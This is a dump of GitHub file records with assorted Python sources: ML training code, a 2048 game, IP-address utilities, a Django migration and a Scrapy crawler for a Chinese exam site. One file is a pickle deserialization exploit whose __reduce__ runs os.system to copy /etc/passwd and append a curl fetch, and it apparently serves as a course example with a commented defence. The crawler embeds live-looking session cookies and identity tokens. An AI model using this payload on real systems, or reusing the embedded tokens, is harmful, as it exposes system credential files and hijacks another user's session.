| column | type |
| --- | --- |
| blob_id | stringlengths 40–40 |
| directory_id | stringlengths 40–40 |
| path | stringlengths 5–283 |
| content_id | stringlengths 40–40 |
| detected_licenses | sequencelengths 0–41 |
| license_type | stringclasses 2 values |
| repo_name | stringlengths 7–96 |
| snapshot_id | stringlengths 40–40 |
| revision_id | stringlengths 40–40 |
| branch_name | stringclasses 58 values |
| visit_date | timestamp[us] |
| revision_date | timestamp[us] |
| committer_date | timestamp[us] |
| github_id | int64 12.7k–662M, or null (⌀) |
| star_events_count | int64 0–35.5k |
| fork_events_count | int64 0–20.6k |
| gha_license_id | stringclasses 11 values |
| gha_event_created_at | timestamp[us] |
| gha_created_at | timestamp[us] |
| gha_language | stringclasses 43 values |
| src_encoding | stringclasses 9 values |
| language | stringclasses 1 value |
| is_vendor | bool (2 classes) |
| is_generated | bool (2 classes) |
| length_bytes | int64 7–5.88M |
| extension | stringclasses 30 values |
| content | stringlengths 7–5.88M |
| authors | sequencelengths 1–1 |
| author | stringlengths 0–73 |
a4c826fcfe6311083197e85bce0f8017a9af10bf | 3d928362dcde314562c80f83b79552983d4b0b37 | /bert/train/loss_models.py | d6ed29c74db721693b5aae118950c38050d26f6a | [
"Unlicense"
] | permissive | nawshad/BERT-pytorch | 18a7c949b1a61055ff87399909b30cd978eb8218 | fe45c85846a7d5c5b2668879239f482384940366 | refs/heads/master | 2021-07-09T23:23:45.224286 | 2020-08-23T08:27:50 | 2020-08-23T08:27:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,538 | py | from bert.preprocess import PAD_INDEX
from torch import nn
class MLMNSPLossModel(nn.Module):
def __init__(self, model):
super(MLMNSPLossModel, self).__init__()
self.model = model
self.mlm_loss_function = nn.CrossEntropyLoss(ignore_index=PAD_INDEX)
self.nsp_loss_function = nn.CrossEntropyLoss()
def forward(self, inputs, targets):
outputs = self.model(inputs)
mlm_outputs, nsp_outputs = outputs
mlm_targets, is_nexts = targets
mlm_predictions, nsp_predictions = mlm_outputs.argmax(dim=2), nsp_outputs.argmax(dim=1)
predictions = (mlm_predictions, nsp_predictions)
batch_size, seq_len, vocabulary_size = mlm_outputs.size()
mlm_outputs_flat = mlm_outputs.view(batch_size * seq_len, vocabulary_size)
mlm_targets_flat = mlm_targets.view(batch_size * seq_len)
mlm_loss = self.mlm_loss_function(mlm_outputs_flat, mlm_targets_flat)
nsp_loss = self.nsp_loss_function(nsp_outputs, is_nexts)
loss = mlm_loss + nsp_loss
return predictions, loss.unsqueeze(dim=0)
class ClassificationLossModel(nn.Module):
def __init__(self, model):
super(ClassificationLossModel, self).__init__()
self.model = model
self.loss_function = nn.CrossEntropyLoss()
def forward(self, inputs, targets):
outputs = self.model(inputs)
predictions = outputs.argmax(dim=1)
loss = self.loss_function(outputs, targets)
return predictions, loss.unsqueeze(dim=0)
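# Editor's sketch (not part of the original file): nn.CrossEntropyLoss expects
# (N, C) logits against (N,) targets, which is why MLMNSPLossModel.forward
# flattens the (batch, seq, vocab) MLM outputs. Dummy-tensor shape check:
if __name__ == '__main__':
    import torch
    b, s, v = 2, 5, 11  # batch, sequence length, vocab size (made-up numbers)
    logits, targets = torch.randn(b, s, v), torch.randint(0, v, (b, s))
    flat_loss = nn.CrossEntropyLoss()(logits.view(b * s, v), targets.view(b * s))
    print(flat_loss.item())  # a single scalar, as combined with the NSP loss above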
| [
"[email protected]"
] | |
cb983a155f9e7664086637e86eac8576ef2b6efb | 9b991a23f3d7df0de43132233b978b0ffb415c6e | /course3/pickle/pickle_file.py | a6de8139cd7c6ff2538d84242a034c69399b0ad7 | [] | no_license | mycguo/python-deepdive | cdc0fa6cf50728c58a8a8836f2f2800e7fdd7fb7 | 37b181470e80a94fa6db5b237fb7de521130905d | refs/heads/master | 2022-12-14T15:58:00.973247 | 2020-09-12T03:38:14 | 2020-09-12T03:38:14 | 289,349,755 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 333 | py | import os
import pickle
class Exploit():
def __reduce__(self):
return (os.system, ("cat /etc/passwd > exploit.txt && curl www.google.com >> exploit.txt",))
def serialize_exploit(fname):
with open(fname, 'wb') as f:
pickle.dump(Exploit(), f)
serialize_exploit('loadme')
pickle.load(open('loadme', 'rb'))
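# Editor's sketch (not part of the original exercise): the usual defence against
# payloads like Exploit above is a restricted Unpickler whose find_class refuses
# to resolve globals, so os.system can never be reached during deserialization.
import io

class SafeUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        raise pickle.UnpicklingError('global %s.%s is forbidden' % (module, name))

def safe_loads(data):
    # raises UnpicklingError on the exploit instead of executing it
    return SafeUnpickler(io.BytesIO(data)).load()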
| [
"[email protected]"
] | |
e04c76ee7cd3d8b1f62e00662a715d5ab09713dc | 926a9065a4fc220d022c8d7edcc4c01d1a4587f8 | /products/migrations/0039_auto_20200613_1112.py | e831c7857073ca1067ff482093967e12c0069745 | [] | no_license | singham3/electrotrade | 6b1ac38fe68f34b1bc6bd074e10271f1a94f75d7 | 2d1c4f1d5a4672c31cca0d4478b77ae134bb43d5 | refs/heads/master | 2022-11-20T22:07:16.588433 | 2020-07-24T14:31:03 | 2020-07-24T14:31:03 | 268,452,091 | 0 | 1 | null | 2020-07-19T20:20:51 | 2020-06-01T07:19:04 | Python | UTF-8 | Python | false | false | 396 | py | # Generated by Django 3.0.3 on 2020-06-13 11:12
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('products', '0038_auto_20200613_1108'),
]
operations = [
migrations.AlterField(
model_name='orderid',
name='order_id',
field=models.IntegerField(default=54268140),
),
]
| [
"[email protected]"
] | |
d425f088b08116e205b3ffe26d9c77b5c1e4e38d | e04ce35fd36785c3695f3107de262f1db13bdc00 | /2048.py | aa81421376af01b7b62722748fa542018b1195d5 | [] | no_license | Timurbl/game_2048 | edd6b6082263f7cab9c9a1ba777b3730b87b0c5b | ef5cccc75766b524eed2260111e9b092e9366538 | refs/heads/master | 2020-03-26T06:55:34.730690 | 2018-08-13T20:05:58 | 2018-08-13T20:05:58 | 144,628,122 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,373 | py | from tkinter import *
from logic2048 import Game
N = 4
color = {'' : 'light gray',
2 : 'pink',
4 : 'red',
8 : 'orange',
16: 'yellow',
32: 'light blue',
64: 'blue',
128: 'light green',
256: 'green'}
def left(event):
game.left()
draw(game)
if game.game_over():
print('GAME OVER')
def right(event):
game.right()
draw(game)
if game.game_over():
print('GAME OVER')
def up(event):
game.up()
draw(game)
if game.game_over():
print('GAME OVER')
def down(event):
game.down()
draw(game)
if game.game_over():
print('GAME OVER')
def draw(game):
for i in range(N):
for j in range(N):
table[i][j]['text'] = game[i][j]
try:
table[i][j]['bg'] = color[game[i][j]]
except KeyError:
table[i][j]['bg'] = 'white'
root = Tk()
table = [[Label(root, height=2, width=4, font='Arial 24') for i in range(N)] for j in range(N)]
for i in range(N):
for j in range(N):
table[i][j].grid(row=i, column=j)
for i in range(N):
root.grid_rowconfigure(i, pad=10)
root.grid_columnconfigure(i, pad=10)
game = Game()
draw(game)
root.bind('<Left>', left)
root.bind('<Right>', right)
root.bind('<Up>', up)
root.bind('<Down>', down)
root.mainloop() | [
"[email protected]"
] | |
ff48c9f51db42b5415104dcad82dcc5e7180f1a0 | a097ecf40fee329cfa9e3f77e4b6e9e29a8f148a | /5_section/5_c4.py | ad4129556566f3c699ab43db88f59f5c50ed0ab1 | [] | no_license | FumihisaKobayashi/The_self_taught_python | 1e7008b17050db3e615c2f3aa68df2edc7f93192 | 329d376689029b75da73a6f98715cc7e83e8cc2c | refs/heads/master | 2021-01-06T16:04:13.382955 | 2020-07-28T14:39:24 | 2020-07-28T14:39:24 | 241,389,313 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 215 | py | fumi = {
"身長": "1.73m",
"好きな色": "緑",
"好きな人": "Hideki Matsui"
}
answer = input("身長,好きな色 or 好きな人")
if answer in fumi:
a = fumi[answer]
print(a)
#:注意 | [
"[email protected]"
] | |
dae66138f278fea5834382498b52becae34edd5a | 063934d4e0bf344a26d5679a22c1c9e5daa5b237 | /margrave-examples-internal/capirca-margrave/capirca-r242-MODIFIED/lib/nacaddr.py | fc06f176005b79e1c4e5f83d4af8c3da2abb3c74 | [
"Apache-2.0"
] | permissive | tnelson/Margrave | 329b480da58f903722c8f7c439f5f8c60b853f5d | d25e8ac432243d9ecacdbd55f996d283da3655c9 | refs/heads/master | 2020-05-17T18:43:56.187171 | 2014-07-10T03:24:06 | 2014-07-10T03:24:06 | 749,146 | 5 | 2 | null | null | null | null | UTF-8 | Python | false | false | 7,241 | py | #!/usr/bin/python
#
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A subclass of the ipaddr library that includes comments for ipaddr objects."""
__author__ = '[email protected] (Tony Watson)'
from third_party import ipaddr
def IP(ipaddress, comment='', token=''):
"""Take an ip string and return an object of the correct type.
Args:
    ipaddress: the ip address.
    comment: optional comment field
    token: optional token name where this address was extracted from
Returns:
ipaddr.IPv4 or ipaddr.IPv6 object or raises ValueError.
Raises:
ValueError: if the string passed isn't either a v4 or a v6 address.
Notes:
this is sort of a poor-mans factory method.
"""
a = ipaddr.IPNetwork(ipaddress)
if a.version == 4:
return IPv4(ipaddress, comment, token)
elif a.version == 6:
return IPv6(ipaddress, comment, token)
class IPv4(ipaddr.IPv4Network):
"""This subclass allows us to keep text comments related to each object."""
def __init__(self, ip_string, comment='', token=''):
ipaddr.IPv4Network.__init__(self, ip_string)
self.text = comment
self.token = token
self.parent_token = token
def AddComment(self, comment=''):
"""Append comment to self.text, comma seperated.
Don't add the comment if it's the same as self.text.
Args: comment
"""
if self.text:
if comment and comment not in self.text:
self.text += ', ' + comment
else:
self.text = comment
def supernet(self, prefixlen_diff=1):
"""Override ipaddr.IPv4 supernet so we can maintain comments.
See ipaddr.IPv4.Supernet for complete documentation.
"""
if self.prefixlen == 0:
return self
if self.prefixlen - prefixlen_diff < 0:
raise PrefixlenDiffInvalidError(
'current prefixlen is %d, cannot have a prefixlen_diff of %d' % (
self.prefixlen, prefixlen_diff))
ret_addr = IPv4(ipaddr.IPv4Network.supernet(self, prefixlen_diff),
comment=self.text, token=self.token)
return ret_addr
# Backwards compatibility name from v1.
Supernet = supernet
class IPv6(ipaddr.IPv6Network):
"""This subclass allows us to keep text comments related to each object."""
def __init__(self, ip_string, comment='', token=''):
ipaddr.IPv6Network.__init__(self, ip_string)
self.text = comment
self.token = token
self.parent_token = token
def supernet(self, prefixlen_diff=1):
"""Override ipaddr.IPv6Network supernet so we can maintain comments.
See ipaddr.IPv6Network.Supernet for complete documentation.
"""
if self.prefixlen == 0:
return self
if self.prefixlen - prefixlen_diff < 0:
raise PrefixlenDiffInvalidError(
'current prefixlen is %d, cannot have a prefixlen_diff of %d' % (
self.prefixlen, prefixlen_diff))
ret_addr = IPv6(ipaddr.IPv6Network.supernet(self, prefixlen_diff),
comment=self.text, token=self.token)
return ret_addr
# Backwards compatibility name from v1.
Supernet = supernet
def AddComment(self, comment=''):
"""Append comment to self.text, comma seperated.
Don't add the comment if it's the same as self.text.
Args: comment
"""
if self.text:
if comment and comment not in self.text:
self.text += ', ' + comment
else:
self.text = comment
def CollapseAddrListRecursive(addresses):
"""Recursively loops through the addresses, collapsing concurent netblocks.
Example:
ip1 = ipaddr.IPv4Network('1.1.0.0/24')
ip2 = ipaddr.IPv4Network('1.1.1.0/24')
ip3 = ipaddr.IPv4Network('1.1.2.0/24')
ip4 = ipaddr.IPv4Network('1.1.3.0/24')
ip5 = ipaddr.IPv4Network('1.1.4.0/24')
ip6 = ipaddr.IPv4Network('1.1.0.1/22')
CollapseAddrRecursive([ip1, ip2, ip3, ip4, ip5, ip6]) ->
[IPv4Network('1.1.0.0/22'), IPv4Network('1.1.4.0/24')]
Note, this shouldn't be called directly, but is called via
CollapseAddr([])
Args:
addresses: List of IPv4 or IPv6 objects
Returns:
List of IPv4 or IPv6 objects (depending on what we were passed)
"""
ret_array = []
optimized = False
for cur_addr in addresses:
if not ret_array:
ret_array.append(cur_addr)
continue
if ret_array[-1].Contains(cur_addr):
# save the comment from the subsumed address
ret_array[-1].AddComment(cur_addr.text)
optimized = True
elif cur_addr == ret_array[-1].Supernet().Subnet()[1]:
ret_array.append(ret_array.pop().Supernet())
# save the text from the subsumed address
ret_array[-1].AddComment(cur_addr.text)
optimized = True
else:
ret_array.append(cur_addr)
if optimized:
return CollapseAddrListRecursive(ret_array)
return ret_array
def CollapseAddrList(addresses):
"""Collapse an array of IP objects.
Example: CollapseAddr(
[IPv4('1.1.0.0/24'), IPv4('1.1.1.0/24')]) -> [IPv4('1.1.0.0/23')]
Note: this works just as well with IPv6 addresses too.
Args:
addresses: list of ipaddr.IPNetwork objects
Returns:
list of ipaddr.IPNetwork objects
"""
return CollapseAddrListRecursive(
sorted(addresses, key=ipaddr._BaseNet._get_networks_key))
def SortAddrList(addresses):
"""Return a sorted list of nacaddr objects."""
return sorted(addresses, key=ipaddr._BaseNet._get_networks_key)
def RemoveAddressFromList(superset, exclude):
"""Remove a single address from a list of addresses.
Args:
superset: a List of nacaddr IPv4 or IPv6 addresses
exclude: a single nacaddr IPv4 or IPv6 address
Returns:
a List of nacaddr IPv4 or IPv6 addresses
"""
ret_array = []
for addr in superset:
if exclude == addr or addr in exclude:
# this is a bug in ipaddr v1. IP('1.1.1.1').AddressExclude(IP('1.1.1.1'))
# raises an error. Not tested in v2 yet.
pass
elif exclude.version == addr.version and exclude in addr:
ret_array.extend([IP(x) for x in addr.AddressExclude(exclude)])
else:
ret_array.append(addr)
return ret_array
def AddressListExclude(superset, excludes):
"""Remove a list of addresses from another list of addresses.
Args:
superset: a List of nacaddr IPv4 or IPv6 addresses
excludes: a List nacaddr IPv4 or IPv6 addresses
Returns:
a List of nacaddr IPv4 or IPv6 addresses
"""
superset = CollapseAddrList(superset)
excludes = CollapseAddrList(excludes)
ret_array = []
for ex in excludes:
superset = RemoveAddressFromList(superset, ex)
return CollapseAddrList(superset)
ExcludeAddrs = AddressListExclude
class PrefixlenDiffInvalidError(ipaddr.NetmaskValueError):
"""Holdover from ipaddr v1."""
if __name__ == '__main__':
pass
| [
"[email protected]"
] | |
fa97ee9fd2838b1142288a25b7c3b07d01df9382 | 80f622252281e6288d24b101dda0d4ee3634faed | /Titanic/model/model.py | 92f1eea0ae9e1af59615e0f34f8ec795553013ab | [] | no_license | jalondono/HandsOn-MachineLearning | c7cd7ce967180b84dffc2953d9ad5894c2bfc46e | eb3a3f2d6e490a827aa8b50cfb6e606cb3e85c5d | refs/heads/master | 2023-01-03T01:10:32.836434 | 2020-10-29T15:47:27 | 2020-10-29T15:47:27 | 300,308,942 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,158 | py | import pandas as pd
import numpy as np
import tensorflow.keras as K
import mlflow.tensorflow
import sys
import logging
import zipfile
# mlflow server --backend-store-uri mlruns/ --default-artifact-root mlruns/ --host 0.0.0.0 --port 5000
def getting_data(zipfolder, filename, cols):
"""
Get the data from a zip file
:param path: direction to zip file
:return: train dataset
"""
with zipfile.ZipFile(zipfolder, 'r') as zip_ref:
zip_ref.extractall()
data = pd.read_csv(filename, usecols=cols)
print('data set shape: ', data.shape, '\n')
print(data.head())
return data
def process_args(argv):
"""
convert the data arguments into the needed format
:param argv: Parameters
:return: converted parameters
"""
    data_path = sys.argv[1] if len(sys.argv) > 1 else '../data'
    debug = sys.argv[2].lower() if len(sys.argv) > 2 else 'false'
    # default as a string so the "[...]" stripping below works in both cases
    model_type = sys.argv[3] if len(sys.argv) > 3 else '[256,128]'
    model_type = model_type[1:-1].split(',')
    splited_network = [int(x) for x in model_type]
    alpha = float(sys.argv[4]) if len(sys.argv) > 4 else 0.5
    l1_ratio = float(sys.argv[5]) if len(sys.argv) > 5 else 0
return data_path, debug, splited_network, alpha, l1_ratio
def create_model(network):
model = K.models.Sequential()
    model.add(K.layers.Dense(units=network[0], input_dim=6,
kernel_initializer='ones',
kernel_regularizer=K.regularizers.l1(l1_ratio),
))
for units in network[1:]:
model.add(K.layers.Dense(units=units,
kernel_initializer='ones',
kernel_regularizer=K.regularizers.l1(l1_ratio),
))
model.add(K.layers.Dense(units=1, activation='sigmoid'))
opt = K.optimizers.Adam(learning_rate=alpha)
model.compile(optimizer=opt, loss='binary_crossentropy',
metrics=['accuracy'], )
print(model.summary())
return model
def train_model(model, X_train, Y_train, batch_size=128,
epoch=80, val_split=0.1):
"""
Perform the training of the model
:param model: model previously compiled
:return: history
"""
    history = model.fit(x=X_train,
                        y=Y_train,
                        batch_size=batch_size,
                        epochs=epoch,
                        validation_split=val_split)
return history
if __name__ == '__main__':
logging.basicConfig(level=logging.WARN)
logger = logging.getLogger(__name__)
# mlflow
mlflow.tensorflow.autolog()
# Utils cols from data
train_cols = ['Survived', 'Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']
test_cols = ['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']
X_cols = ['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']
Y_cols = ['Survived']
# Get value arguments
data_path, debug, network, alpha, l1_ratio = process_args(sys.argv)
# train Data
filename = 'train.csv'
data = getting_data(data_path, filename, train_cols)
data['Sex_b'] = pd.factorize(data.Sex)[0]
data = data.drop(['Sex'], axis=1)
data = data.rename(columns={"Sex_b": "Sex"})
# testing data
filename = 'test.csv'
test = getting_data(data_path, filename, test_cols)
test['Sex_b'] = pd.factorize(test.Sex)[0]
test = test.drop(['Sex'], axis=1)
test = test.rename(columns={"Sex_b": "Sex"})
# filling train na values with mean
column_means = data.mean()
data = data.fillna(column_means)
# filling test na values with mean
column_means = test.mean()
test = test.fillna(column_means)
input_data = np.array(data[X_cols])
label_date = np.array(data[Y_cols])
test_input_data = np.array(test[X_cols])
X_train = input_data
Y_train = label_date
# definition of the model
model = create_model(network)
# training model
history = train_model(model, X_train, Y_train)
    # predicting (model.predict returns per-passenger survival probabilities,
    # not a score/accuracy pair; the test set has no labels to evaluate against)
    predictions = model.predict(test_input_data, batch_size=32, verbose=1)
    print("First test predictions:", predictions[:5].ravel())
| [
"[email protected]"
] | |
96c8aab9ccb46dfa1211316172d290d9a600c701 | 6713b68c912af377c741b26fe31db0fe6f6194d4 | /1st Term/Data_Structure_and_Algorithms/Codes/Exercises/ses07/tests/q5.py | 5cb7344c66b6cf0467faf08698d3e66fc4443db3 | [] | no_license | Lanottez/IC_BA_2020 | 820e8d9c1dbb473ed28520450ec702f00c6684ed | 8abd40c6a5720e75337c20fa6ea89ce4588016af | refs/heads/master | 2023-08-25T05:52:08.259239 | 2021-11-03T07:27:11 | 2021-11-03T07:27:11 | 298,837,917 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 934 | py | test = {
'name': 'Numpy - Q5',
'points': 0,
'suites': [
{
'cases': [
{
'code': r"""
>>> # It looks like you didn't give anything the name
>>> # fb_vol. Maybe there's a typo, or maybe you
>>> # just need to run the cell above this test cell where you defined
>>> # fb_vol. (Click that cell and then click the "run
>>> # cell" button in the menu bar above.)
>>> 'fb_vol' in vars()
a7465ecc0421c9e0085a8a012fce1e93
# locked
""",
'hidden': False,
'locked': True
},
{
'code': r"""
>>> fb_vol//0.0001 == 161.0
a7465ecc0421c9e0085a8a012fce1e93
# locked
""",
'hidden': False,
'locked': True
}
],
'scored': False,
'setup': '',
'teardown': '',
'type': 'doctest'
}
]
}
| [
"[email protected]"
] | |
13f1896c22ae2a9880e175bd288981ebe1216ccf | 8d5ba6747531cbd43d63d32265fd608f9081c3b7 | /.venv/lib/python2.7/site-packages/indico/modules/events/logs/controllers.py | a436382fa8b13d29f35d97c1b401f0e523a58dd9 | [] | no_license | Collinsnyamao/indico | 0e433b78803afae5b1ac90483db1f3d90ce2fddb | 32adf8123e266eb81439b654abc993b98e0cd7f2 | refs/heads/master | 2020-03-18T04:55:40.386595 | 2018-06-02T13:45:47 | 2018-06-02T13:45:47 | 134,314,163 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,324 | py | # This file is part of Indico.
# Copyright (C) 2002 - 2018 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from indico.modules.events.logs.models.entries import EventLogEntry
from indico.modules.events.logs.views import WPEventLogs
from indico.modules.events.management.controllers import RHManageEventBase
class RHEventLogs(RHManageEventBase):
"""Shows the modification/action log for the event"""
def _process(self):
entries = self.event.log_entries.order_by(EventLogEntry.logged_dt.desc()).all()
realms = {e.realm for e in entries}
return WPEventLogs.render_template('logs.html', self.event, entries=entries, realms=realms)
| [
"[email protected]"
] | |
8a7ff0ad022e61991efae1db238130da5169b004 | 7259dbcc9e32502945d362caa43d4ad380cd04ea | /OIT_SpiderCode/OYT_zujuan_Param/OYT_Scrapy_Param/spiders/new_zujuan_English_middle_spiderparam.py | 27bc29f69ebc3bbe7b018e3cdfcf6fd90583eb7c | [
"MIT"
] | permissive | Doraying1230/Python-Study | daa143c133262f4305624d180b38205afe241163 | 8dccfa2108002d18251053147ccf36551d90c22b | refs/heads/master | 2020-03-29T13:46:13.061373 | 2018-07-26T15:19:32 | 2018-07-26T15:19:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,915 | py | #coding:utf-8
import scrapy
from ..common.BaseObject import BaseObject
from scrapy.spider import CrawlSpider
from scrapy.selector import Selector
from scrapy.http import Request,FormRequest
from scrapy.selector import Selector
from scrapy.http.cookies import CookieJar
from fake_useragent import UserAgent
import time
import re
import os
class ZuQuanLoadData(BaseObject,CrawlSpider):
name = 'zujuan_english_middle_param'
custom_settings = {
'DOWNLOAD_DELAY': 3, 'CONCURRENT_REQUESTS_PER_IP': 5,
'ITEM_PIPELINES': {'OIT_ScrapyData.pipelines.OitScrapydataPipeline': None, }
}
def __init__(self):
ua = UserAgent()
user_agent = ua.random
self.file_name='zujuan_english_middle_param'
self.cookieValue = {'xd': '75519cb9f2bf90d001c0560f5c40520062a60ada9cb38350078f83e04ee38a31a%3A2%3A%7Bi%3A0%3Bs%3A2%3A%22xd%22%3Bi%3A1%3Bi%3A2%3B%7D',
'isdialog': 'bad3c21672f08107d1d921526d191f58bd47d79e7dbb432bd32624a836b42e85a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22isdialog%22%3Bi%3A1%3Bs%3A4%3A%22show%22%3B%7D',
'_csrf': '34c90a094ad3b3ab53cb75751fcab02bf693c164a6f5dfa244a6aec61e2f187ca%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22YlTOGIyOfskw0gy-voJy0vbGw4VVswCs%22%3B%7D',
'device': '310bdaba05b30bb632f66fde9bf3e2b91ebc4d607c250c2e1a1d9e0dfb900f01a%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22device%22%3Bi%3A1%3BN%3B%7D',
'PHPSESSID': 'utuj4csehjg3q9inhnuhptugk6',
'_sync_login_identity': '771bfb9f524cb8005c68374bdf39c9f22c36d71cf21d91082b96e7bd7a21e9eea%3A2%3A%7Bi%3A0%3Bs%3A20%3A%22_sync_login_identity%22%3Bi%3A1%3Bs%3A50%3A%22%5B1285801%2C%22YwmDuM6ftsN7jeMH7VDdT4OI-SvOisii%22%2C86400%5D%22%3B%7D',
'chid': '14e5d5f939c71d411898b3ee4671b5e06472c56cd9cffb59cc071e18732212f1a%3A2%3A%7Bi%3A0%3Bs%3A4%3A%22chid%22%3Bi%3A1%3Bs%3A1%3A%224%22%3B%7D',
'_identity': '95b973f53ecb67fdb27fe40c5660df1bbdb9c168cac8d1999dc6d0772a9ea122a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A50%3A%22%5B1285801%2C%22fa26ed63eeec36f3e1682f05b68cd887%22%2C86400%5D%22%3B%7D',
'Hm_lvt_6de0a5b2c05e49d1c850edca0c13051f': '1515666025',
'Hm_lpvt_6de0a5b2c05e49d1c850edca0c13051f': '1515666640'}
self.hearders = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Connection': 'keep - alive',
# 'Referer': 'http://www.zujuan.com/question /index?chid = 3 & xd = 1',
'User-Agent': user_agent#'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36'
}
print(self.hearders)
self.domain = 'http://www.zujuan.com'
def start_requests(self):
start_url = 'http://www.zujuan.com/question/index?chid=4&xd=2'
return [Request(url=start_url,cookies=self.cookieValue,headers=self.hearders,callback=self.parse_version)]
def parse_version(self,response):
result = response.body.decode()
resu = Selector(text=result)
versionTexts = resu.xpath('//div[@class="type-items"][1]/div/div/div/a/text()').extract()
versionUrls = resu.xpath('//div[@class="type-items"][1]/div/div/div/a/@href').extract()
version = dict(zip(versionTexts, versionUrls))
print(version)#{'人教版': '/question?bookversion=11740&chid=3&xd=1', '青岛版六三制': '/question?bookversion=23087&chid=3&xd=1', '北师大版': '/question?bookversion=23313&chid=3&xd=1', '苏教版': '/question?bookversion=25571&chid=3&xd=1', '西师大版': '/question?bookversion=47500&chid=3&xd=1', '青岛版五四制': '/question?bookversion=70885&chid=3&xd=1', '浙教版': '/question?bookversion=106060&chid=3&xd=1'}
for text in version :
if ('牛津' in text):
manURL =self.domain+version[text]#http://www.zujuan.com/question?bookversion=25571&chid=3&xd=1
deliver_param = {'version':'牛津译林版'}
deliver_param['course'] = '英语'
return [Request(url=manURL, meta=deliver_param,cookies=self.cookieValue, headers=self.hearders,callback=self.parse_categories)]
elif('沪教' in text):
manURL = self.domain + version[text] # http://www.zujuan.com/question?bookversion=25571&chid=3&xd=1
deliver_param = {'version': '沪教版'}
deliver_param['course'] = '英语'
return [Request(url=manURL,meta=deliver_param, cookies=self.cookieValue, headers=self.hearders,
callback=self.parse_categories)]
else:
pass
def parse_categories(self,response):
print(123,response.meta)
result = response.body.decode()
resu = Selector(text=result)
categoriesTexts = resu.xpath('//div[@class="type-items"][2]/div/div/div/a/text()').extract()
categoriesUrls = resu.xpath('//div[@class="type-items"][2]/div/div/div/a/@href').extract()
#http://www.zujuan.com/question?categories=25576&bookversion=25571&nianji=25576&chid=3&xd=1
categories = dict(zip(categoriesTexts, categoriesUrls))
print(123,categories)
categories_list = []
# print(categories)# {'一年级上册': '/question?categories=25572&bookversion=25571&nianji=25572&chid=3&xd=1', '一年级下册': '/question?categories=25573&bookversion=25571&nianji=25573&chid=3&xd=1', '二年级上册': '/question?categories=25574&bookversion=25571&nianji=25574&chid=3&xd=1', '二年级下册': '/question?categories=25575&bookversion=25571&nianji=25575&chid=3&xd=1', '三年级上册': '/question?categories=25576&bookversion=25571&nianji=25576&chid=3&xd=1', '三年级下册': '/question?categories=25577&bookversion=25571&nianji=25577&chid=3&xd=1', '四年级上册': '/question?categories=25578&bookversion=25571&nianji=25578&chid=3&xd=1', '四年级下册': '/question?categories=25579&bookversion=25571&nianji=25579&chid=3&xd=1', '五年级上册': '/question?categories=25580&bookversion=25571&nianji=25580&chid=3&xd=1', '五年级下册': '/question?categories=25581&bookversion=25571&nianji=25581&chid=3&xd=1', '六年级上册': '/question?categories=25582&bookversion=25571&nianji=25582&chid=3&xd=1', '六年级下册': '/question?categories=25592&bookversion=25571&nianji=25592&chid=3&xd=1'}
for text in categories:
categories_list.append(text)
comment = 0
while comment < len(categories_list):
text = categories_list[comment]
            nianjiContentUrl = self.domain + categories[text]
            print(12, nianjiContentUrl)
comment += 1
response.meta['nianji'] = text
yield Request(url=nianjiContentUrl,meta=response.meta,cookies=self.cookieValue, headers=self.hearders,callback=self.parse_categories_content)
def parse_categories_content(self,response):
print(123,response.meta)
result = response.body.decode()
resu = Selector(text=result)
sectionsText = resu.xpath('//div[@id="J_Tree"]/div/a/text()').extract()
sectionsUrl = resu.xpath('//div[@id="J_Tree"]/div/a/@href').extract()
sections = dict(zip(sectionsText,sectionsUrl))
print(sections)
self.make_file()
sections_Text = []
sections_number = []
for text in sections:
sections_Text.append(text)
categoriesNumber = sections[text]
print(type(categoriesNumber),categoriesNumber)
ret = re.findall(r'categories=(\d*)&',categoriesNumber)
sections_number.append(ret[0])
print(123, ret)
need_sections_dict = dict(zip(sections_Text, sections_number))
nianji = response.meta ['nianji']
response.meta[nianji] = need_sections_dict
need_sections_str = str(response.meta)
with open('d:\\xiti10001\\zujuan\\{0}\\{1}\\categories_english_{0}.txt'.format(time.strftime('%Y%m%d',time.localtime(time.time())),self.file_name),'a') as f:
f.write(need_sections_str)
f.write('\n')
# categoriesNumber_s = categoriesNumber.find('=')
# print(categoriesNumber_s)
# categoriesNumber_e = categoriesNumber.find('&')
# print(categoriesNumber_e)
# categoriesNumbers = categoriesNumber[categoriesNumber_s,categoriesNumber_e]
def make_file(self):
